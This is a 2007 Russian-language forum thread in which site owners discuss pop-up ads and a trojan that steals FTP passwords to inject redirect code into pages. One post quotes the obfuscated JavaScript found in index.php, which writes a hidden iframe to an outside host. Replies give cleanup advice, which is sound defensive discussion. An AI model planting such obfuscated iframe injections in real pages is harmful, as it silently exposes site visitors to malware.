drim 0 Опубликовано: 4 сентября 2007 Рассказать Опубликовано: 4 сентября 2007 месяц назад поймал вирус рекламу стоял а меня антивир avira не чего не находил поставил касперского7 тоже не чего не находит а он задолбал по пять окон за час открывает этого покерного клуба кто сталкивался с этой проблемой подскажите чем можно его отловить Цитата Ссылка на сообщение Поделиться на других сайтах
Mikhailo 0 Опубликовано: 4 сентября 2007 Рассказать Опубликовано: 4 сентября 2007 Почему сразу вирус? Может это какой-то скрипт? Ищи код <script> у себя на главной Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 сентября 2007 Рассказать Опубликовано: 4 сентября 2007 drim, мля ты знаки препинания в школе проходил?? Цитата Ссылка на сообщение Поделиться на других сайтах
drim 0 Опубликовано: 4 сентября 2007 Рассказать Опубликовано: 4 сентября 2007 Автор проходил но очень давно Mikhailo, как искать и где а то я токо купил комп и я еще пока не шарю если не трудно конечно или кто нибудь плиз буду очень блогодарен вам Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 4 сентября 2007 Рассказать Опубликовано: 4 сентября 2007 (изменено) http://forum.dle-news.ru/index.php?showtopic=36145 Посмотри файл шаблона main.tpl Изменено 4 сентября 2007 пользователем Danila Цитата Ссылка на сообщение Поделиться на других сайтах
Sench_ 0 Опубликовано: 6 сентября 2007 Рассказать Опубликовано: 6 сентября 2007 да как я понял у него вирус в компе сидит и DLE тут ни при чем... drim, ты случайно не ошибся форумом? Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 6 сентября 2007 Рассказать Опубликовано: 6 сентября 2007 Вирус сидит в компьютере и ДЛЕ действительно не причем. Просто с помощью этого вируса воруют ФТП пароли и делают вставки с переадресайией на зараженные сайты. Обычно это индексные файлы (index.php, index.htm, index.html). но у меня был случай когда в шаблон main.tpl вставили, причем грамотно вверху после тэга ajax. Явно делал человек. Цитата Ссылка на сообщение Поделиться на других сайтах
krott 0 Опубликовано: 21 сентября 2007 Рассказать Опубликовано: 21 сентября 2007 Здравствуйте, поймал вирус? Вот код: <!-- ~ --><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C107%2C105%2C111%2C116%2C101%2C46%2C105%2C110%2C102%2C111%2C47%2C105%2C112%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><!-- ~ --> Был найден в index.php и даже в стандартном файле index.html который хостинг автоматом создаёт. Что за вирус, подскажите плизз что делать с ним? Цитата Ссылка на сообщение Поделиться на других сайтах
REALiSTiC 0 Опубликовано: 21 сентября 2007 Рассказать Опубликовано: 21 сентября 2007 Тебя протроянили. Переставляй винду и меняй пароль на фтп (не наоборот!). А код нужно просто удалиить... Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 21 сентября 2007 Рассказать Опубликовано: 21 сентября 2007 винду-то нахрена переставлять??? Просто проверься антивирусом, вирус называется trojan downloader удали его, смени пароль на фтп, удали скрипт с сайта и всё. Цитата Ссылка на сообщение Поделиться на других сайтах
krott 0 Опубликовано: 21 сентября 2007 Рассказать Опубликовано: 21 сентября 2007 Тебя протроянили. Переставляй винду и меняй пароль на фтп (не наоборот!). А код нужно просто удалиить... Так и сделал, сейчас вроде всё нормально. Спасибо большое за помощь! Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.